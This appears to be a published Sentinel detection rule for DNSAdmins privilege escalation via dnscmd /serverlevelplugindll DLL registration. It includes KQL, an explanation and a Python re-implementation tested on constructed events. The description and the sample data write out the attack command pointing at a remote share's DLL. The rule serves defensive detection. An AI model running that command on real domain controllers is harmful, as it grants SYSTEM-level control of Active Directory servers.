Query Details

16 DNS DNS Admin DLL Injection

Query

id: a1b2c3d4-0016-4a5b-8c9d-dns016dnsadmin
name: DNSAdmins Privilege Escalation via DLL Injection (dnscmd /serverlevelplugindll)
description: |
  Detects the DNSAdmins Active Directory privilege escalation technique where
  a member of the DNSAdmins group registers a malicious DLL to be loaded into
  dns.exe (which runs as SYSTEM) using:
    dnscmd.exe /config /serverlevelplugindll \\attacker\share\evil.dll
  The attack requires a subsequent DNS service restart to load the DLL, at
  which point the payload executes as NT AUTHORITY\SYSTEM on the DNS server
  (typically a Domain Controller).
  This technique was publicly documented by Shay Ber in 2017 and has been
  used in real-world attacks. Any account in DNSAdmins — even a low-privilege
  domain account — can execute this technique without Domain Admin rights.
  Key signals detected by this rule:
    1. dnscmd.exe executed with /serverlevelplugindll in the command line
    2. DNS service stop/restart within 60 minutes on the same host
  Both conditions must match on the same Computer within the time window.
  MITRE T1574.002 (Hijack Execution Flow: DLL Side-Loading via DNS service)
  MITRE T1078.002 (Domain Accounts — DNSAdmins group membership)
  Ref: Shay Ber "Abusing DNSAdmins privilege for escalation in Active Directory"
severity: High
requiredDataConnectors:
  - connectorId: SecurityEvents
    dataTypes:
      - SecurityEvent
queryFrequency: 1h
queryPeriod: 1h
triggerOperator: gt
triggerThreshold: 0
status: Available
tactics:
  - PrivilegeEscalation
  - Persistence
relevantTechniques:
  - T1574.002
  - T1078.002
tags:
  - DNSAdmins
  - DLL Injection
  - Privilege Escalation
  - SYSTEM
  - Active Directory
  - dns.exe
query: |
  // Step 1: Detect dnscmd.exe invoked with /serverlevelplugindll
  // (registers arbitrary DLL to be loaded by dns.exe at SYSTEM privilege)
  let DnscmdAbuse =
      SecurityEvent
      | where TimeGenerated > ago(1h)
      | where EventID == 4688  // Process Creation (requires audit policy)
      | where NewProcessName has "dnscmd.exe"
      | where CommandLine has "serverlevelplugindll"
      | project
          DnscmdTime   = TimeGenerated,
          Computer,
          SubjectAccount = SubjectUserName,
          CommandLine;
  // Step 2: Detect DNS service restart following the dnscmd call
  // Restart is required to load the DLL — without it the attack is incomplete
  let DnsServiceRestart =
      SecurityEvent
      | where TimeGenerated > ago(1h)
      | where EventID == 7036 or EventID == 4697
      | where Activity has "DNS" or ServiceName contains "DNS"
      | project
          RestartTime   = TimeGenerated,
          Computer,
          ServiceEvent  = Activity;
  // Correlate: same Computer, restart within 60 min of dnscmd
  DnscmdAbuse
  | join kind=inner DnsServiceRestart on Computer
  | where abs(datetime_diff("minute", DnscmdTime, RestartTime)) < 60
  | project
      DnscmdTime,
      Computer,
      SubjectAccount,
      CommandLine,
      RestartTime,
      ServiceEvent
entityMappings:
  - entityType: Host
    fieldMappings:
      - identifier: FullName
        columnName: Computer
  - entityType: Account
    fieldMappings:
      - identifier: Name
        columnName: SubjectAccount
customDetails:
  CommandLine: CommandLine
  ServiceEvent: ServiceEvent
alertDetailsOverride:
  alertDisplayNameFormat: "DNSAdmins DLL Injection — {{SubjectAccount}} on {{Computer}} registered malicious DLL"
  alertDescriptionFormat: "User {{SubjectAccount}} on {{Computer}} executed dnscmd /serverlevelplugindll (command: '{{CommandLine}}'). DNS service restart detected within 60 minutes — malicious DLL may have been loaded by dns.exe at SYSTEM privilege level."

Explanation

This query is designed to detect a specific security threat in an Active Directory environment, where someone with DNSAdmins privileges attempts to escalate their privileges using a technique called DLL Injection. Here's a simplified breakdown:

  1. What It Detects: The query looks for a member of the DNSAdmins group registering a DLL to be loaded by the DNS server process (dns.exe), which runs as SYSTEM. The registration is done with the command dnscmd.exe /config /serverlevelplugindll.

  2. How It Works:
    • Step 1: It first checks for the execution of dnscmd.exe with the command line argument /serverlevelplugindll, which indicates an attempt to register a plugin DLL.
    • Step 2: It then looks for a DNS service restart (EventID 7036 or 4697 referencing DNS) on the same computer within 60 minutes of the dnscmd.exe execution. The restart is necessary for the registered DLL to be loaded and executed.

  3. Why It's Important: This technique allows an attacker to execute code with SYSTEM privileges on a DNS server, which is often a Domain Controller, without needing Domain Admin rights. It was publicly documented in 2017 and has been used in real-world attacks.

  4. Severity and Response: The severity is marked as High, indicating a significant security risk. The query runs every hour over the last hour of data and raises an alert as soon as at least one correlated match is found (triggerThreshold 0).

  5. Technical Details:
    • It uses SecurityEvent data (EventID 4688 process creation, which requires the process creation audit policy, and service events) to identify the dnscmd execution and the service restart.
    • It inner-joins the two result sets on Computer and keeps pairs whose timestamps differ by less than 60 minutes.

  6. Output: If the conditions are met, the query generates an alert with the user account involved, the computer affected, the dnscmd command line and the service event, indicating that a registered DLL may have been loaded by dns.exe.

Overall, this query helps security teams identify and respond to potential privilege escalation attempts in their network.
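To show the two-step correlation the rule performs without a Sentinel workspace, here is an added Python re-implementation of the same logic (this is not part of the original rule). It runs over constructed SecurityEvent-like rows, including two non-matching cases (benign dnscmd use on another host, and a DNS restart outside the 60-minute window); host names, the account name and the share path are assumptions.

```python
from datetime import datetime, timedelta

def ev(t, eid, computer, **fields):
    # Minimal SecurityEvent-like row; all sample data here is constructed
    row = dict(TimeGenerated=t, EventID=eid, Computer=computer, NewProcessName="",
               CommandLine="", SubjectUserName="", Activity="", ServiceName="")
    row.update(fields)
    return row

T0 = datetime(2026, 3, 26, 10, 0)
SAMPLE_EVENTS = [
    # dnscmd registering a plugin DLL on DC01: the first signal in the rule
    ev(T0, 4688, "DC01", NewProcessName=r"C:\Windows\System32\dnscmd.exe",
       CommandLine=r"dnscmd.exe /config /serverlevelplugindll \\10.0.0.5\share\plugin.dll",
       SubjectUserName="jdoe"),
    # DNS Server service restart on DC01 twelve minutes later: inside the window
    ev(T0 + timedelta(minutes=12), 7036, "DC01", ServiceName="DNS",
       Activity="7036 - The DNS Server service entered the running state"),
    # Routine dnscmd zone work on DC02 without the plugin switch: must not match
    ev(T0, 4688, "DC02", NewProcessName=r"C:\Windows\System32\dnscmd.exe",
       CommandLine="dnscmd.exe /zoneadd lab.local /primary", SubjectUserName="ops"),
    # DNS restart on DC02 with no plugin registration on that host: must not match
    ev(T0 + timedelta(minutes=5), 7036, "DC02", ServiceName="DNS"),
    # Second DNS service event on DC01 three hours later: outside the 60-minute window
    ev(T0 + timedelta(hours=3), 4697, "DC01", ServiceName="DNS"),
]

def has(text, term):
    # Approximates KQL has/contains for this purpose: case-insensitive substring
    return term.lower() in (text or "").lower()

def correlate(events, window_minutes=60):
    # Same two-step logic as the KQL: filter each side, inner-join on Computer, keep pairs
    # closer than the window in either direction (abs(datetime_diff(...)) < 60 in the rule)
    dnscmd = [e for e in events if e["EventID"] == 4688
              and has(e["NewProcessName"], "dnscmd.exe")
              and has(e["CommandLine"], "serverlevelplugindll")]
    restarts = [e for e in events if e["EventID"] in (7036, 4697)
                and (has(e["Activity"], "DNS") or has(e["ServiceName"], "DNS"))]
    alerts = []
    for d in dnscmd:
        for r in restarts:
            gap = abs((d["TimeGenerated"] - r["TimeGenerated"]).total_seconds()) / 60
            if r["Computer"] == d["Computer"] and gap < window_minutes:
                alerts.append(dict(DnscmdTime=d["TimeGenerated"], Computer=d["Computer"],
                                   SubjectAccount=d["SubjectUserName"], CommandLine=d["CommandLine"],
                                   RestartTime=r["TimeGenerated"], ServiceEvent=r["Activity"]))
    return alerts
```

Note that, exactly like the rule's abs() comparison, a DNS restart shortly before the dnscmd call also produces a match; tightening the window to require the restart after the registration would reduce noise from unrelated restarts.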

Details


David Alonso

Released: March 26, 2026

Tables

SecurityEvent

Keywords

DNSAdmins, DLL Injection, Privilege Escalation, SYSTEM, Active Directory, DNS, Domain Controller, SecurityEvents, SecurityEvent, Process Creation, Computer, SubjectAccount, CommandLine, ServiceEvent, Host, Account

Operators

let, |, where, >, ago(), ==, has, project, or, contains, join, kind=inner, on, abs(), datetime_diff(), <
